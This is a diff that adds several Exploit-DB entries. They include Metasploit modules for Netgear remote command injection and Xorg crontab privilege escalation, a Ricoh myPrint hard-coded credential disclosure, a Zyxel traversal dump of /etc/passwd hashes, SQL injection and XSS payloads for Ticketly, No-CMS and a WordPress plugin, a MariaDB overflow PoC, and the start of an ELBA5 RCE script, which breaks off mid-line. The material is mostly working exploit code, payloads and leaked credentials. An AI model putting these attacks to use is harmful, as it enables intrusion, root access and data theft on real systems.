diff --git a/exploits/hardware/remote/45909.rb b/exploits/hardware/remote/45909.rb new file mode 100755 index 000000000..dbad30230 --- /dev/null +++ b/exploits/hardware/remote/45909.rb @@ -0,0 +1,104 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Netgear Devices Unauthenticated Remote Command Execution', + 'Description' => %q{ + From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php, + (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in + Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, + WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute + arbitrary commands. + }, + 'Author' => + [ + 'Daming Dominic Chen ', # Vuln discovery + 'Imran Dawoodjee ' # MSF module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2016-1555'], + ['URL', 'https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic'], + ['PACKETSTORM', '135956'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/112'] + ], + 'DisclosureDate' => 'Feb 25 2016', # According to http://seclists.org/fulldisclosure/2016/Feb/112 + 'Privileged' => true, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'Payload' => {}, + 'DefaultOptions' => { + 'CMDSTAGER::FLAVOR' => 'wget', + 'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp', + 'WfsDelay' => 10 }, + 'Targets' => [['Automatic', { }]], + 'CmdStagerFlavor'=> %w{ echo printf wget }, + 'DefaultTarget' => 0 + )) + register_options( + [ + OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']), # boardDataWW.php + OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', Rex::Text.rand_text_hex(12)]) + ]) + end + + # check for vulnerability existence + def check + fingerprint = Rex::Text.rand_text_alpha(12) # If vulnerability is present, we will get this back in the response + res = execute_command("echo #{fingerprint}") # the raw POST response + + unless res + vprint_error 'Connection failed' + return CheckCode::Unknown + end + + unless res.code == 200 + return CheckCode::Safe + end + + unless res.get_html_document.at('input').to_s.include? fingerprint + return CheckCode::Safe + end + + CheckCode::Vulnerable + end + + # execute a command, or simply send a POST request + def execute_command(cmd, opts = {}) + vars_post = { + 'macAddress' => "#{datastore['MAC_ADDRESS']};#{cmd};", + 'reginfo' => '1', + 'writeData' => 'Submit' + } + + send_request_cgi({ + 'method' => 'POST', + 'headers' => { 'Connection' => 'Keep-Alive' }, + 'uri' => normalize_uri(target_uri.path), + 'vars_post' => vars_post + }) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!") + end + + # the exploit method + def exploit + #run a check before attempting to exploit + unless [CheckCode::Vulnerable].include? check + fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!' + end + + execute_cmdstager(linemax: 2048) # maximum 130,000 + end + +end \ No newline at end of file diff --git a/exploits/hardware/webapps/45899.txt b/exploits/hardware/webapps/45899.txt new file mode 100644 index 000000000..7fec34d8e --- /dev/null +++ b/exploits/hardware/webapps/45899.txt @@ -0,0 +1,283 @@ +# Exploit Title: Ricoh myPrint 2.9.2.4 - Hard-Coded Credentials +# Google Dork: intitle:"ricoh myprint" "Copyright Ricoh. All Rights Reserved" +# Date: 2018-11-19 +# Exploit Author: Hodorsec +# Vendor Homepage: https://www.ricoh.com +# Software Link: https://www.ricoh-europe.com/support/product-support/software-support-detail.html?prodId=100-13203 +# Versions: +# myPrint - Windows client version 2.9.2.4 +# myPrint - Android client version 2.2.7 +# Tested on: Ricoh myPrint clients and WSDL webservice +# WSDL URL format: https://{HOST}/RicohmyPrint/MyPrintWebService.asmx?wsdl +# CVE: N/A + +# Description: +# Hardcoded credentials in the Ricoh myPrint application 2.9.2.4 for Windows and 2.2.7 for Android +# give access to any externally disclosed myPrint WSDL API, as demonstrated by discovering +# API secrets of related Google cloud printers, encrypted passwords of mail servers and +# names of printed files. + +# Additional Information: +# Hardcoded credentials in the Ricoh myPrint application 2.9.2.4 for Windows and 2.2.7 for +# Android (reverse-engineered, identical credentials), gives access +# to any externally disclosed Ricoh myPrint WSDL API. Using the found credentials, several info can be obtained, such as: +# * Show settings such as local paths, used mailserver, mailaddresses for POP/IMAP and encrypted passwords (appears to be stream-based +# encrypted, seeing different lengths of base64 hashes passwords (Algorithm yet unknown)). --> ReadMobileSettings +# * Checks if a password is valid for ANY known user; returns "true" if password is valid for a known user --> IsPasswordValid +# * Shows all user info such as ID, name by looking up email alias --> IdentifierByEmailAlias +# * Show used internal IP addresses and TCP ports of related printers/server for Ricoh myPrint +# * Show related Google cloud printers with API secrets --> ReadGoogleCloudPrinters +# * Show all printjob-statuses with filenames --> GetJobList +# * Show related organizations --> ReadOrganizations + +# Affected Components: +# * Tested Ricoh myPrint clients with indicated versions and probably any remotely accessible myPrint webserver with an accessible WSDL API. + +# Affected Code: +# * Android client "WebService.java" +...... +public static final class +{ + + public static final String AUTH_PASS = "Kyg63WfC"; + public static final String AUTH_USER = "ricohmyprint"; + public static final String NS_RICOH = "http://RicohmyPrint.com/"; + public static final String NS_SOAP12 = "http://www.w3.org/2003/05/soap-envelope"; + public static final String PRE_RICOH = "ric"; + public static final String PRE_SOAP12 = "soap"; + public static final String SERVICE = "/RicohmyPrint/myprintwebservice.asmx"; + public static final String SUPPORTED_LANGS[] = { + "en", "ca", "de", "es", "fr", "it", "nl", "no", "pl", "pt", + "sv" + }; +...... + +Attack Type: + * Remote + +Attack Vectors: +Steps: + * Download the Android APK or Windows executable installer + * Reverse engineer the APK or DLL's from the Windows installer + * Look for the string "PASS" with a regex tool, which should pop up a hit + * Access the WSDL on a reachable Ricoh myPrint environment and enumerate operations with a SOAP tool (e.g. "ReadMobileSettings") + * Use any operation, substitute the "AuthSoapHd" values for UserName and Password with the found credentials + * Perform the request and check results + +Hardcoded Credentials: + * Username: ricohmyprint + * Password: Kyg63WfC + +Header requirement: +Required for using in an SOAP WSDL POST message as a header with values: + + + + + + + + + + +Examples: + * ReadMobileSettings +--------------------------------------------- +REQUEST + + + + + + + + + + + + + + + +RESPONSE + + + + + + C:\ProgramData\RICOH\WatchFolder + C:\ProgramData\RICOH\ProcessFolder + C:\ProgramData\RICOH\WebUploadFolder + 0 + myPrintToFile + RICOH Aficio MP C3500 PCL 6 + + SINGLE + 5 + POP3 + pop.someserver.local + 110 + true + print@someserver.local + REDACTED + + + 5 + false + + + smtp.someserver.local + 25 + Ricoh myPrint + someuser@someserver.local + false + + REDACTED + + + 0 + 80 + false + + 5 + 1080 + + + 0 + false + postmaster + + + + + +--------------------------------------------- + + * IdentifierByEmailAlias +--------------------------------------------- +REQUEST: + + + + + + + + + + + + + + admin + + + + +RESPONSE: + + + + + true + + 1337 + 83e754ff-fa1d-48b6-adb2-7cb60a22476d + admin + someuser@someserver.local + 1osd9KJ + 5 + € 5,00 + 123456 + + 1 + false + true + false + + + GB + + 0 + TwoSidedLongEdge + Monochrome + true + true + StapleTopLeft + One + true + true + + + IDPLocal + false + false + + 1 + 1 + LPR + Default printer + 127.0.0.1 + lp + 515 + true + 0 + true + + + + + + + + +--------------------------------------------- + +Soap Endpoints: + * ApplyAgreementAcceptance + * ChangePassword + * ClearCache + * CreateAccount + * CreateAccountByCardId + * FinishedJobProcessing + * GetConditionsUri + * GetImage + * GetJobList + * GetLanguageTable + * GetPrintCapabilities + * GetPrintQueueRuleResult + * GetSupportUri + * IdentifierByEmailAlias + * IsPasswordValid + * LogIn + * Operation + * ReadAccount + * ReadGoogleCloudPrinters + * ReadMobileSettings + * ReadMpPrintQueues + * ReadOrganizations + * ReadSettings + * ReSendPincode + * ResetPassword + * RetrieveCloudPrintJobsAllowed + * RetrieveEmailAllowed + * SendCancelPrintJob + * SendHeartbeat + * SendPrinterName + * Test + * UpdateAccount + * UpdateGoogleCloudPrinter + * UploadFile + * UploadFileAndPrintTicket + * VerifyJobProcessing + * VoucherToCash + * WaitingJob + * WriteLog + +Disclosure Timeline using CERT/CC disclosure policy: + - 04-10-18: Requested CVE + - 05-10-18: Contacted vendor for initial contact, used several publicly known mailaddresses + - 10-10-18: Contacted CERT for Vulnerability Disclosure coordination due to no response from vendor + - 22-10-18: CERT responded it received no response on their behalf from vendor + - 22-10-18: Sent reminder to vendor + - 19-11-18: Public Disclosure \ No newline at end of file diff --git a/exploits/hardware/webapps/45904.txt b/exploits/hardware/webapps/45904.txt new file mode 100644 index 000000000..de8fe232c --- /dev/null +++ b/exploits/hardware/webapps/45904.txt @@ -0,0 +1,21 @@ +# Exploit Title: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal +# Date: 2018-11-17 +# Exploit Author: numan türle +# Vendor Homepage: https://www.zyxel.com/ +# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/ +# Tested on: macOS +# Fixed firmware: 5.13(AAXA.8)C0 + +# PoC +@modem_gateway = "192.168.1.1" // default address + +http://@modem_gateway/../../../../../../../../../../../../etc/passwd + +here are the contents : + +############################## contents ############################## +nobody:x:99:99:nobody:/nonexistent:/bin/false +root:zKtrESdI2DPME:0:0:root:/home/root:/bin/sh +supervisor:.t7H3bCRtJ6UY:12:12:supervisor:/home/supervisor:/bin/sh +admin:avHcRxJLoXvas:21:21:admin:/home/admin:/bin/sh +user:AebeEcyKDnOzI:31:31:user:/home/user:/bin/sh \ No newline at end of file diff --git a/exploits/linux/dos/45901.txt b/exploits/linux/dos/45901.txt new file mode 100644 index 000000000..715666424 --- /dev/null +++ b/exploits/linux/dos/45901.txt @@ -0,0 +1,63 @@ +# Exploit Title: MariaDB Client 10.1.26 - Denial of Service (PoC) +# Google Dork: None +# Date: 2018-11-16 +# Exploit Author: strider +# Software Link: https://github.com/MariaDB/server +# Version: mysql Ver 15.1 Distrib 10.1.26-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2 +# Tested on: Debian 9 Stretch x64 / Ubuntu 18.04 x86_64 +# CVE : None + +# Description: +# MariaDB uses environment variables. The PAGER variable is vulnerable to a bufferoverflow. +# If the environment variable PAGER is greater or equals 512 characters it will crash and make client unusable. + +# This is caused by a the function strmov which takes all from source and copy that +# into destination which have a fixed size. + +Codepart: +static char default_pager[FN_REFLEN]; + +char *tmp=getenv("PAGER"); +if (tmp && strlen(tmp)) +{ + default_pager_set= 1; + strmov(default_pager, tmp); +} + + +Proof of Concept: + +Step 1: + +export PAGER=$(python -c "print '\x41' * 512") + +Step 2: + +mariadb -u user -p + +Crash + +--------------------------------------------------------------------- +peda output: + +Program received signal SIGSEGV, Segmentation fault. + +[----------------------------------registers-----------------------------------] +RAX: 0x555555b73600 ('A' ...) +RBX: 0x555555b7cbc8 ('A' ...) +RCX: 0x70 ('p') +RDX: 0x0 +RSI: 0x555555bafe40 ('A' ...) +RDI: 0x555555bb0040 +RBP: 0x7fffffffdfa0 --> 0x555555639a80 (<__libc_csu_init>: push r15) +RSP: 0x7fffffffdd48 --> 0x55555558e5bc (: mov rax,QWORD PTR [r12]) +RIP: 0x7ffff677e2e6 (<__strcpy_sse2_unaligned+374>: movdqu XMMWORD PTR [rdi-0x40],xmm4) +R8 : 0x555555b92580 ('A' ...) +R9 : 0x20 (' ') +R10: 0x7fffffffa5a0 --> 0x7fffffffa5d0 --> 0x7fffffffdb80 --> 0x7fffffffdc10 --> 0x0 +R11: 0x7ffff6846d68 --> 0xfff37778fff37768 +R12: 0x555555b00bc0 --> 0x555555b00b80 --> 0x40000000 ('') +R13: 0x7ffff6a846e8 --> 0x7ffff6a84600 --> 0xfbad2084 +R14: 0x0 +R15: 0x0 +EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) \ No newline at end of file diff --git a/exploits/multiple/local/45908.rb b/exploits/multiple/local/45908.rb new file mode 100755 index 000000000..a7dc27950 --- /dev/null +++ b/exploits/multiple/local/45908.rb @@ -0,0 +1,215 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GoodRanking + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::Kernel + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Xorg X11 Server SUID privilege escalation', + 'Description' => %q{ + This module attempts to gain root privileges with SUID Xorg X11 server + versions 1.19.0 < 1.20.3. + + A permission check flaw exists for -modulepath and -logfile options when + starting Xorg. This allows unprivileged users that can start the server + the ability to elevate privileges and run arbitrary code under root + privileges. + + This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708). + CentOS default install will require console auth for the users session. + Cron launches the payload so if Selinux is enforcing exploitation + may still be possible, but the module will bail. + Xorg must have SUID permissions and may not start if running. + + On exploitation a crontab.old backup file will be created by Xorg. + This module will remove the .old file and restore crontab after + successful exploitation. Failed exploitation may result in a corrupted + crontab. On successful exploitation artifacts will be created consistant + with starting Xorg and running a cron. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Narendra Shinde', # Discovery and exploit + 'Raptor - 0xdea', # Modified exploit for cron + 'Aaron Ringo', # Metasploit module + 'Brendan Coles ' # Metasploit module + ], + 'DisclosureDate' => 'Oct 25 2018', + 'References' => + [ + [ 'CVE', '2018-14665' ], + [ 'BID', '105741' ], + [ 'EDB', '45697' ], + [ 'EDB', '45742' ], + [ 'EDB', '45832' ], + [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ], + [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ] + ], + 'Platform' => %w[openbsd linux], + 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], + 'SessionTypes' => %w[shell meterpreter], + 'Targets' => + [ + ['OpenBSD', { + 'Platform' => 'unix', + 'Arch' => [ ARCH_CMD ] } ], + ['Linux x64', { + 'Platform' => 'linux', + 'Arch' => [ ARCH_X64 ] } ], + ['Linux x86', { + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86 ] } ] + ], + 'DefaultOptions' => + { + 'PAYLOAD' => 'cmd/unix/reverse_openssl', + 'WfsDelay' => 120 + }, + 'DefaultTarget' => 0)) + + register_advanced_options( + [ + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), + OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]), + OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]) + ] + ) + end + + + def check + + # linux checks + uname = cmd_exec "uname" + if uname =~ /linux/i + vprint_status "Running additional check for Linux" + if datastore['ConsoleLock'] + user = cmd_exec "id -un" + unless exist? "/var/run/console/#{user}" + vprint_error "No console lock for #{user}" + return CheckCode::Safe + end + vprint_good "Console lock for #{user}" + end + if selinux_installed? + if selinux_enforcing? + vprint_error 'Selinux is enforcing' + return CheckCode::Safe + end + end + vprint_good "Selinux is not an issue" + end + + # suid program check + xorg_path = cmd_exec "command -v Xorg" + unless xorg_path.include?("Xorg") + vprint_error "Could not find Xorg executable" + return CheckCode::Safe + end + vprint_good "Xorg path found at #{xorg_path}" + unless setuid? xorg_path + vprint_error "Xorg binary #{xorg_path} is not SUID" + return CheckCode::Safe + end + vprint_good "Xorg binary #{xorg_path} is SUID" + + # version check + x_version = cmd_exec "Xorg -version" + if x_version.include?("Release Date") + v = Gem::Version.new(x_version.scan(/\d\.\d+\.\d+/).first) + unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2')) + vprint_error "Xorg version #{v} not supported" + return CheckCode::Safe + end + elsif x_version.include?("Fatal server error") + vprint_error "User probably does not have console auth" + vprint_error "Below is Xorg -version output" + vprint_error x_version + return CheckCode::Safe + else + vprint_warning "Could not parse Xorg -version output" + return CheckCode::Appears + end + vprint_good "Xorg version #{v} is vulnerable" + + # process check for /X + proc_list = cmd_exec "ps ax" + if proc_list.include?('/X ') + vprint_warning('Xorg in process list') + return CheckCode::Appears + end + vprint_good('Xorg does not appear running') + return CheckCode::Vulnerable + end + + def on_new_session(session) + if session.type.to_s.eql? 'meterpreter' + session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' + session.sys.process.execute '/bin/sh', "-c \"#{@clean_up}\"" + else + session.shell_command(@clean_up) + end + print_good "Returning session after cleaning" + ensure + super + end + + def exploit + + check_status = check + if check_status == CheckCode::Appears + print_warning 'Could not get version or Xorg process possibly running, may fail' + elsif check_status == CheckCode::Safe + fail_with Failure::NotVulnerable, 'Target not vulnerable' + end + + if is_root? + fail_with Failure::BadConfig, 'This session already has root privileges' + end + + unless writable? datastore['WritableDir'] + fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" + end + + print_good 'Passed all initial checks for exploit' + + pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}" + @clean_up = "/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old" + xdisplay = datastore['Xdisplay'] + + # Uploading file crontab will run + print_status 'Uploading your payload, this could take a while' + if payload.arch.first == 'cmd' + write_file(pscript, payload.encoded) + else + write_file(pscript, generate_payload_exe) + end + register_file_for_cleanup pscript + chmod pscript + + # Exploit steps on crontab so backing it up + cmd_exec "cat /etc/crontab > #{pscript}.b" + # Actual exploit with cron overwrite + print_status 'Trying /etc/crontab overwrite' + cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null" + Rex.sleep 5 + cmd_exec "pkill Xorg" + Rex.sleep 1 + cron_check = cmd_exec "grep -F #{pscript} /etc/crontab" + unless cron_check.include? pscript + rm_f "#{pscript}.b" + print_error 'Deleting crontab backup' + fail_with Failure::NotVulnerable, '/etc/crontab not modified' + end + print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...' + end +end \ No newline at end of file diff --git a/exploits/php/webapps/45900.txt b/exploits/php/webapps/45900.txt new file mode 100644 index 000000000..64c46f034 --- /dev/null +++ b/exploits/php/webapps/45900.txt @@ -0,0 +1,30 @@ +# Exploit Title: Wordpress Plugins Easy Testimonials 3.2 - Cross-Site Scripting +# Date: 2018-11-23 +# Exploit Author: En_dust +# Vendor Homepage: https://wordpress.org/plugins/easy-testimonials/ +# Software Link: https://wordpress.org/plugins/easy-testimonials/ +# Version: 3.2 +# CVE : N/A +# Tested on: Windows 10 x64 + +# description: +# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins easy testimonials 3.2. +# Three parameters(_ikcf_client _ikcf_position _ikcf_other) have Cross-Site Scripting. + +# POC +# XSS Stored + +POST http://localhost/wp-admin/post.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 2152 +Referer: http://localhost/wp-admin/post-new.php?post_type=testimonial&wp-post-new-reload=true +Cookie: wp-saving-post=25-check; wp-saving-post=22-saved; wordpress_524b5a925bc7b1b05f5b295d7fcd09b9=admin%7C1543134496%7CkuybvZvg3evKxitZn7s2lZSoaeDOfbTwXP0iMKFz425%7C481919de475c08441e455ffe01f4b8a241ea13f3a4255be476841ddc281597bc; wp-settings-time-1=1542959022; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26posts_list_mode%3Dexcerpt; PHPSESSID=au6fo2rac6sn2hgk0mnniq17k2; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_524b5a925bc7b1b05f5b295d7fcd09b9=admin%7C1543134496%7CkuybvZvg3evKxitZn7s2lZSoaeDOfbTwXP0iMKFz425%7C9bce6802e21d94bc37ab3eabf8dfe2950603d327e32a8ad14e167b4550d036dc +Connection: keep-alive +Upgrade-Insecure-Requests: 1 + +_wpnonce=b3ca69b020&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dtestimonial&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=testimonial&original_post_status=auto-draft&referredby=&_wp_original_http_referer=&auto_draft=&post_ID=25&meta-box-order-nonce=c25a6e37b2&closedpostboxesnonce=4784cc9ba9&post_title=test&samplepermalinknonce=f39f8eec26&content=test&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&aa=2018&mm=11&jj=23&hh=17&mn=12&ss=56&hidden_mm=11&cur_mm=11&hidden_jj=23&cur_jj=23&hidden_aa=2018&cur_aa=2018&hidden_hh=17&cur_hh=17&hidden_mn=12&cur_mn=12&original_publish=%E5%8F%91%E5%B8%83&publish=%E5%8F%91%E5%B8%83&tax_input%5Beasy-testimonial-category%5D%5B%5D=0&neweasy-testimonial-category=%E6%96%B0%E5%88%86%E7%B1%BB%E7%9B%AE%E5%BD%95%E5%90%8D&neweasy-testimonial-category_parent=-1&_ajax_nonce-add-easy-testimonial-category=50d8975094&my-custom-fields_wpnonce=b074ff3409&_ikcf_client=[XSS]&_ikcf_email=test%40test.com&_ikcf_position=[XSS]&_ikcf_other=[XSS]&_ikcf_rating=1&excerpt=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=81df7811e1&post_name=&post_grid_post_settings_input_nonce=95c656b2da&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dtestimonial&post_grid_post_settings%5Bpost_skin%5D=flat&post_grid_post_settings%5Bcustom_thumb_source%5D=http%3A%2F%2Fwww.wordpress.com%2Fwp-content%2Fplugins%2Fpost-grid%2Fassets%2Ffrontend%2Fcss%2Fimages%2Fplaceholder.png&post_grid_post_settings%5Bfont_awesome_icon%5D=&post_grid_post_settings%5Bfont_awesome_icon_color%5D=737272&post_grid_post_settings%5Bfont_awesome_icon_size%5D=50px&post_grid_post_settings%5Bcustom_youtube_id%5D=&post_grid_post_settings%5Bcustom_vimeo_id%5D=&post_grid_post_settings%5Bcustom_dailymotion_id%5D=&post_grid_post_settings%5Bcustom_mp3_url%5D=&post_grid_post_settings%5Bcustom_soundcloud_id%5D= \ No newline at end of file diff --git a/exploits/php/webapps/45902.txt b/exploits/php/webapps/45902.txt new file mode 100644 index 000000000..ecb39c32d --- /dev/null +++ b/exploits/php/webapps/45902.txt @@ -0,0 +1,79 @@ +# Exploit Title: Ticketly 1.0 – Multiple SQL Injection +# Exploit Author: Javier Olmedo +# Website: https://hackpuntes.com +# Date: 2018-11-19 +# Google Dork: N/A +# Vendor: Abisoft (https://abisoftgt.net) +# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql +# Affected Version: 1.0 +# Patched Version: unpatched +# Category: Web Application +# Platform: Windows & Ubuntu +# Tested on: Win10x64 & Kali Linux +# CVE: 2018-18923 + +# 1. Technical Description: +# Ticketly 1.0 are affected by SQL Injection in multiple parameters and +# resources through POST. This allows a attacker to read and modify +# sensitive information from the database used by the application. + +# 2. Proof Of Concept (PoC): +# 2.1 The following POST request generates an error 500 in the Application (add ' in name parameter) +--- +POST /ticketly/action/addproject.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 +Accept: */* +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://localhost/ticketly/projects.php +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 32 +Connection: close + +name=Test%22&description=Test +--- + +# 2.2 In another request, add two ' to receive a code 200 OK +--- +POST /ticketly/action/addproject.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 +Accept: */* +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://localhost/ticketly/projects.php +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 32 +Connection: close + +name=Test%22%22&description=Test +--- + +# 3. Payloads +# 3.1 Payload (boolean-based blind) +name=Test" RLIKE (SELECT (CASE WHEN (4632=4632) THEN 0x54657374 ELSE 0x28 END)) AND "lrmZ"="lrmZ&description=Test + +# 3.2 Payload (error-based) +name=Test” AND EXTRACTVALUE(9139,CONCAT(0x5c,0x7176766a71,(SELECT (ELT(9139=9139,1))),0x7178717a71)) AND "SZJL"="SZJL&description=Test + +#3.3 Payload (AND/OR time-based blind) +name=Test” RLIKE SLEEP(5) AND "WkTS"="WkTS&description=Test + +# 4. Vulnerables resources and parameters +# /action/addproject.php (description, name, category_id and description) +# /action/addticket.php (king_id, priority_id, project_id, status_id and title) +# /reports.php (kind_id y status_id) + +# 5. Timeline +# 24/07/2018 Discovery +# 24/07/2018 Contact with developer +# 24/07/2018 Solution to vulnerability as pending +# 02/11/2018 Request ID CVE +# 04/11/2018 Assigned CVE-2018-18923 +# 05/11/2018 Public disclosure + +# 6. References: +# https://hackpuntes.com/cve-2018-18923-ticketly-1-0-multiples-sql-injections/ \ No newline at end of file diff --git a/exploits/php/webapps/45903.txt b/exploits/php/webapps/45903.txt new file mode 100644 index 000000000..01bd474ba --- /dev/null +++ b/exploits/php/webapps/45903.txt @@ -0,0 +1,42 @@ +# Exploit Title: No-Cms 1.0 - 'order_by' SQL Injection +# Date: 2018-11-28 +# Exploit Author: Loading Kura Kura +# Vendor Homepage: https://github.com/goFrendiAsgard/No-CMS +# Software Link: https://codeload.github.com/goFrendiAsgard/No-CMS/zip/master +# Tested on: Win10/Kali Linux +# Google Dork: n/a +# Version: n/a +# CVE : + +# No-CMS is a CMS-framework. +# No-CMS is a basic and "less-assumption" CMS with some default features such as +# user authorization (including third party authentication), menu, module and theme management. +# It is fully customizable and extensible, you can make your own module and your own themes. +# It provide freedom to make your very own CMS, which is not provided very well by any other CMS. + +# POC +#Sqli injection { order_by[0] } + +POST /nocms/main/manage_privilege/index/export HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/nocms/main/manage_privilege +Content-Type: application/x-www-form-urlencoded +Content-Length: 76 +Connection: close +Cookie: bb9865483ae270ceba27539501d10599=rf0at4ehbd1ttckd85skvf17ssq4dfh2; crud_page_a36781f1e31bde68770f40381aad7df6=1; per_page_a36781f1e31bde68770f40381aad7df6=25; hidden_ordering_a36781f1e31bde68770f40381aad7df6=asc; hidden_sorting_a36781f1e31bde68770f40381aad7df6=index; search_text_a36781f1e31bde68770f40381aad7df6=; search_field_a36781f1e31bde68770f40381aad7df6=; 3c158ec1144ba8bb0dd8a7ca03988b5c=e4p2j92lle03vpp6ccuv2c8dro86ebep; crud_page_710a7d8c82ae37e845c3da5df1073379=1; per_page_710a7d8c82ae37e845c3da5df1073379=25; hidden_ordering_710a7d8c82ae37e845c3da5df1073379=desc; hidden_sorting_710a7d8c82ae37e845c3da5df1073379=date; search_text_710a7d8c82ae37e845c3da5df1073379=dd; search_field_710a7d8c82ae37e845c3da5df1073379=sec0e67fc; __secret_code=d282ef263719ab842e05 +Upgrade-Insecure-Requests: 1 + +search_text=&search_field=/**/&per_page=25&order_by[0]=[INJECT HERE]&order_by[1]=&page=1 + +========================= +Regards +Loading Kura Kura +thanks To : +Siluman IWAK +Siluman Cupatkai +Siluman TUMO +dan kamu sayang :* \ No newline at end of file diff --git a/exploits/windows/remote/45905.py b/exploits/windows/remote/45905.py new file mode 100755 index 000000000..00db837d3 --- /dev/null +++ b/exploits/windows/remote/45905.py @@ -0,0 +1,216 @@ +# Exploit Title: ELBA5 5.8.0 - Remote Code Execution +# Date: 2018-11-16 +# Exploit Author: Florian Bogner +# Vendor Homepage: https://www.elba.at +# Vulnerable Software: https://www.elba.at/eBusiness/01_template1/1206507788612244132-1206515595789049657_1206515641959948315-1292519691128454196-NA-38-NA.html +# Version: up to 5.8.0 +# Tested on: any Windows OS +# Full Writeup: https://bogner.sh/2018/11/0-day-in-elba5s-network-installation-overtaking-your-companys-bank-account/ +# Summary: This exploit has been tested against ELBA5 version 5.7.1 to 5.8.0. It can be used to remotely obtain code +# execution on the ELBA5 server with full SYSTEM level permissions. Additionally, a backdoor user can be added + +Please see attachment for the full python exploit. + +import sys +import hashlib + +try: + import sqlanydb +except: + print("\n") + print("==================================================") + print("This exploit depends on the sqlanydb python module") + print("Run \"pip install sqlanydb\" to install it") + print("==================================================") + print("\n") + raise + +# this should be defined on the cli +DB_HOST=None +ACTION=None + +# The default ELBA port +DB_PORT="2640" + +# The servername to connect to... does not really matter anywhay +DB_SERVERNAME="ELBA5SRV" + +# The initial "connector" database user that is used to obtain the actual DBA credentials +DB_CONNECTOR_UID="connector" +DB_CONNECTOR_PWD="connector" + +# The actual DB user with DBA permissions +DB_DBA_UID="elba" +DB_DBA_PWD=None +DB_DBA_ENCRYPTION_PWD="Af&Pw_dw7$Yd9#" + +def main(): + print("==================================================") + print(" ELBA5 Electronic Banking (https://www.elba.at/)") + print(" Network Installation RCE 